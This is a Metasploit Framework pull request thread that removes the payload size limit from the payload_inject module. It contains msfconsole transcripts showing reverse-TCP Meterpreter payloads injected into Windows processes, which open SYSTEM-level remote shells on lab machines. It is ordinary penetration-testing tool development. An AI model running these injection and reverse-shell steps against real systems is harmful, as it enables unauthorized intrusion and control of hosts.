Remove the size restriction from payload_inject
rapid7/metasploit-framework pull request #10874
Opened 2018-10-28 01:31 UTC by zeroSteiner

This Pull Request removes the unnecessary size restriction from the `exploit/windows/local/payload_inject` module. This has the notable advantage of enabling use of the newer and much larger stageless payloads (like `windows/x64/meterpreter_reverse_tcp`).

The size restriction isn't necessary since the module will handle allocating the necessary space for the payload anyways.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] Get a functioning session on a Windows host
- [ ] `use exploit/windows/local/payload_inject`
- [ ] Set the payload to a newly-available large stageless one
  - [ ] `set PAYLOAD windows/x64/meterpreter_reverse_tcp`
- [ ] Run the module and get a functioning session corresponding to the selected payload

## Example Usage
```
metasploit-framework (S:1 J:1) exploit(windows/local/payload_inject) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WINDOWS8VM
OS              : Windows 8.1 (Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > background 
[*] Backgrounding session 1...
metasploit-framework (S:1 J:1) exploit(windows/local/payload_inject) > set PAYLOAD windows/x64/meterpreter_reverse_tcp
PAYLOAD => windows/x64/meterpreter_reverse_tcp
metasploit-framework (S:1 J:1) exploit(windows/local/payload_inject) > set LHOST 192.168.90.1 
LHOST => 192.168.90.1
metasploit-framework (S:1 J:1) exploit(windows/local/payload_inject) > set SESSION -1
SESSION => -1
metasploit-framework (S:1 J:1) exploit(windows/local/payload_inject) > exploit

[*] [2018.10.27-21:23:43] Started reverse TCP handler on 192.168.90.1:4444 
[*] [2018.10.27-21:23:43] Running module against WINDOWS8VM
[-] [2018.10.27-21:23:43] PID  does not actually exist.
[*] [2018.10.27-21:23:43] Launching notepad.exe...
[*] [2018.10.27-21:23:43] Performing Architecture Check
[*] [2018.10.27-21:23:43] Process found checking Architecture
[+] [2018.10.27-21:23:43] Process is the same architecture as the payload
[*] [2018.10.27-21:23:43] Preparing 'windows/x64/meterpreter_reverse_tcp' for PID 3196
[*] [2018.10.27-21:23:44] Creating the thread to execute in 0x400000 (pid=3196)
[*] Meterpreter session 2 opened (192.168.90.1:4444 -> 192.168.90.12:49177) at 2018-10-27 21:23:44 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WINDOWS8VM
OS              : Windows 8.1 (Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getpid
Current pid: 3196
meterpreter > 
```

2018-10-28 05:39 UTC, OJ commented
I've been meaning to PR this for ages :)

2018-10-30 15:21 UTC, bwatters-r7 commented
I had a conversation with @egypt a long time ago about how we should best account for exploits like this.  Is the consensus now just removing the size?  I recall there being a concern about that; I have simply bumped the size over our largest payload (certainly suboptimal, TBH)  so I'm cool if this is the new standard.

2018-10-30 15:23 UTC, wvu-r7 commented
The size restriction is wholly unnecessary here. Note that `DisableNops` is a no-op without `Space`.

2018-11-02 17:38 UTC, wvu requested changes
> Note that `DisableNops` is a no-op without `Space`.

2018-11-02 20:00 UTC, space-r7 commented
Tested:

```

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.136:49158) at 2018-11-02 14:51:02 -0500

meterpreter > sysinfo
Computer        : WIN-MGMN7ND70I1
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/windows/local/payload_inject 
msf5 exploit(windows/local/payload_inject) > set session 1
session => 1
msf5 exploit(windows/local/payload_inject) > set pid 424
pid => 424
msf5 exploit(windows/local/payload_inject) > set payload windows/x64/meterpreter_reverse_tcp
payload => windows/x64/meterpreter_reverse_tcp
msf5 exploit(windows/local/payload_inject) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(windows/local/payload_inject) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Running module against WIN-MGMN7ND70I1
[*] Preparing 'windows/x64/meterpreter_reverse_tcp' for PID 424
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.136:49159) at 2018-11-02 14:52:49 -0500

meterpreter > sysinfo
Computer        : WIN-MGMN7ND70I1
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows

```

2018-11-05 19:33 UTC, wvu-r7 commented
@zeroSteiner: Whoops, my review comment was for @space-r7. Thanks for fixing it anyway!

2018-11-05 19:33 UTC, wvu approved these changes

2018-11-05 21:19 UTC, merged